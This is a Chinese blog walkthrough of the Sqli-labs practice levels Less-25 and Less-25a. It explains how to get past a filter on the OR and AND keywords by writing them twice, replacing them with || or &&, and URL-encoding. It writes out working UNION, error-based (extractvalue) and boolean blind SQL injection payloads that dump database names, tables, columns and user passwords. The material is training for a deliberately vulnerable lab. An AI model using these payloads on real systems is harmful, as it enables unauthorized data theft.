Sqli-labs之Less-25和Less-25a

最新推荐文章于 2024-04-01 21:31:40 发布
最新推荐文章于 2024-04-01 21:31:40 发布
阅读量873 收藏 4
点赞数 2
分类专栏: Sqli-labs环境通关教程-学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39934520/article/details/105668080
版权

                                               Less-25

GET-基于错误-您所有的OR&AND都属于我们-字符串单引号


Notice: Undefined variable: hint in C:\phpStudy\WWW\sqli\Less-25\index.php on line 81
Hint: Your Input is Filtered with following result:

翻译:

注意:未定义变量:在第81行的C:\ phpStudy \ WWW \ sqli \ Less-25 \ index.php中提示
提示:将使用以下结果过滤您的输入:

一上来就有报错与提示信息。

我们先正常输入,看返回的页面是什么样子的:

?id=1

有两条只要信息:1.页面返回了用户名和密码信息 2.有提示信息,提示:您的输入已过滤,结果如下:1 

通过以上信息我们了解到这道关卡将会对我们注入的一些字符进行过滤。

那么测试引号闭合问题:

?id=1' 和 ?id=1"

   

发现是单引号注入,且没有对单引号进行过滤,由于中间字体图片过大,这里注释掉源文件显示该图片的代码,方便显示。

接下来就是过滤绕过了:

有过滤的时候首先要判断这个过滤是一次性的还是非一次性的:

若是一次性的,且只是将过滤字符换成了空字符:

  • 双写绕过—— or=oorrand=anandd

若是非一次性的,就要考虑一些变形:

  • 大小写变形绕过—— or=Or=oR=OR

  • 利用运算符——   or=||and=&&

  • URL编码绕过——  #=%23,Hex编码—— ~=0x7e

  • 添加注释  ——  /*or*/

。。。。。

在开始注入前还要说一下的是,在url中空格和一些特殊字符会进行url编码例如:#是%23,空格是%20

所以这样写 ?id=1'# 将会报错,要写成这样 ?id=1'%23 才不会报错,所以我们可以使用 -- #进行注入或者 --+

查看下源码:

不区分大小写的意思:比如A和a作为不同字符看待,不区分是作为同一字符看待

本关卡是一次性绕过,所以可以利用手写绕过,当然也可以利用运算符进行绕过,因为源码中知识
这里的正则匹配//i同时匹配大小写,所以不能用大小写绕过。

双写绕过

暴字段:

?id=1' oorrder by 3-- #

  

?id=-1' union select 1,2,3-- #

暴库:

?id=-1' union select 1,user(),database()-- #

爆表:

?id=-1' union select 1,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema='security'),3-- #

爆字段:

?id=-1' union select 1,(select group_concat(column_name) from infoorrmation_schema.columns where table_schema='security' anandd table_name='users'),3-- #

爆数据:

?id=-1' union select 1,(select group_concat(concat_ws('-',id,username,passwoorrd)) from users),3-- #

运算符绕过

?id=-1' || extractvalue(1,concat(0x7e,database()))-- #

或者

?id=1' || extractvalue(1,concat(0x7e,database()))-- #     都是一样的,理解or和函数extractvalue在一起的作用就会明白这两种写法都对。

剩下的自己尝试。

注意这里使用&&运算符会报错:(不知道为什么)

?id=1' && extractvalue(1,concat(0x7e,database()))-- #

这关使用布尔盲注也是没问题的:

?id=-1' || left(version(),1)=5-- #

                                                                           (无错误的回显)

这里也要强调的是使用 oorr,aandnd,|| 进行绕过都是没问题的,但使用 && 就是不行,它只会报错,原理现在还不清楚。

PS:

后来发现对&&进行url编码,变成了%26%26,那么就可以进行注入:

 

==================== 分隔符 =======================

                                                          Less-25a


基于Bool_GET_过滤AND/OR_数字型_盲注

1正常回显,1'1"都报错,判断为数字型注入:

 

本关与Less-25十分相似,既可以正常union注入也可以用脚本BoolTime盲注。但却不能报错注入

?id=-1 || extractvalue(1,concat(0x7e,database()))-- #  

原因在于没有输出错误项,即关闭了错误报告。

具体过程自行尝试。

(再说一点小知识:如果在一个php文件最前面写入函数error_reporting(0)那么,这一个页面将不会返回任何warning(警告信息,不影响其他php文件

 

红烧兔纸
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在安装 sqli-labs 之前,我们需要准备好以下...
sqli-labs:less-25(过滤了and,or)
羽的博客
09-12 206
很人性化,还可以返回被过滤的语句。方便学习。 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" con..
sql绕过less-23 less-25 less-26 less-27 以及一点http头注入 less-18 less-5
weixin_74182283的博客
04-01 1257
拆分该语句 为了完成绕过,需要先将id进行闭合 因此语句为 id='xx' || 1',此时多了个单引号出来,因此需要将其闭合,变成id='xx' || '1',语句为id='xx' || '1' 这时,因为||是可以替代or来进行使用的(这个是学计算机的基本常识),在语法中相当于或者,而此时右边的 '1' 永远为真(因为 '1' 永远都是’1‘ )因此可以通过该语句直接完成绕过。而我们这里的http头注入所运用的报错函数,他就是需要~才能导致报错的出现,因此只要存在波浪线,就可以确保这个函数报错。
Less-25(绕过or或and--盲注)
老司机开代码的博客
08-04 454
文章目录1. 题目分析2. 注入思路2.1 盲注2.2 联合注入3. SQLmap注入 1. 题目分析 根据less24的经验以及通过?id=1 aandnd 1=2 --+和?id=1 aandnd 1=1 --+可以判断出id的类型为int;并且可以使用盲注或联合查询两种方法解决的题目。 一下主要回顾盲注的解题思路: False页面: True页面: 之前学习过盲注,我们知道盲注主要分为布尔盲注和时间盲注,同时再回忆一下要使用的函数: length() :判断字长 substr(): 从字符串中取
sqli-labs-Advanced
Starr
02-18 1087
文章目录一. 过滤23. GET-strip comments25. GET-strip and/or25a. Blind 2526. GET-strip Spaces and Comments26a. Blind 26!!!!!!!!!!!!!!!!!!!27. GET-strip UNION/SELECT27a. Blind 2728. GET-strip UNION/SELECT-single quote with parenthesis28a.二. Second Order Injection24.
SQLi LABS Less 25a 联合注入+布尔盲注+时间盲注
wangyuxiang946的博客
08-15 1万+
SQLi 第25a关,SQLi-LABS Less-25a,SQLi-LABS Less 25a,SQLiLABS Less25a,SQLi Less 25a
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
安装sqli-labs
10-22
安装完成sqli-labs靶场环境后,可以根据关卡信息练习,结合write up(通关指南)和手工测试工具使用sqli-labs靶场环境。 总结 安装sqli-labs靶场环境可以提供一个安全和合法的环境来学习和实践Web应用安全。通过...
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
phpstudy+靶场sqli-labs-master下载
11-08
phpstudy+靶场sqli-labs-master下载
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
sqli-labs配置数据库sqli-labs的数据库文件
03-09
Unable to connect to the database: security sqli-labs通过docker安装时,缺少数据库文件,可以通过这个sql文件直接安装
sqli-labs实验指导手册
11-17
sqli-labs是一个专门设计的实验平台,用于教育和实践SQL注入技术。以下是对sqli-labs实验指导手册中涉及的SQL注入知识点的详细说明: 1. **字符型联合注入**(如less-1): - **注入点检测**:通过修改查询参数...
sqli-labs.rar
12-22
SQL注入练习平台搭建,需要PHPstudy等对应的工具配合使用,很适合小白练习,收悉SQL的注入由浅入深 东西是好东西网上也有,后期会出教程。
SQLi LABS Less 25 联合注入+报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
06-28 1万+
SQLi 第二十五关,SQLi-LABS Less-25,SQLi-LABS Less 25,SQLiLABS Less25,SQLi Less 25
2021-08-28培训web作业一sqli-labs
qq_45290991的博客
08-28 306
1-20的第4关联合注入 对于这个1-20关,不是说选一个吗?我选第4关:基于报错的双引号注入。 输入id=1’ 发现是”)闭合。 Where id = (“x”)? 我猜。然后看语句:果然!$result=mysql_query($sql);//返回查询的数据的一个结果集,需要用php相应的mysql函数取值。比如mysql_fetch_array()这个函数 会报错显示,并且限制一次回显行数。 不赘述。 5-19的第17关报错注入 班长说这个也是选一题,所以我选的是...
sqli-labs-less25-less25a
沐目的博客
04-10 499
less-25 单引号 GET型 一道水题,就是让我们感受一下过滤,只是过滤了or和and。 就是用很基础的union 查询就可以了。但是注意一下,在写information的时候,它会把“or“给过滤掉,但是我们可以使用双写绕过。 数据库: -1’ union select 1,2,database() %23 表和字段: -1’ union select 1,group_concat...
sqli-labs-less1
最新发布
05-26
sqli-labs-less1是一个SQL注入练习平台,它主要用于学习和测试SQL注入攻击技术。sqli-labs-less1是一个非常基础的例子,旨在演示如何使用SQL注入攻击来绕过登录认证。它提供了一个登录页面,其中包含用户名和密码字段。攻击者可以通过在输入框中输入特定的字符串来尝试绕过认证。 如果您想深入学习SQL注入攻击技术,sqli-labs-less1可能是一个很好的练习平台。但请注意,这个平台是为了学术目的而设计的,不要在未授权的情况下尝试对任何真实的系统进行SQL注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值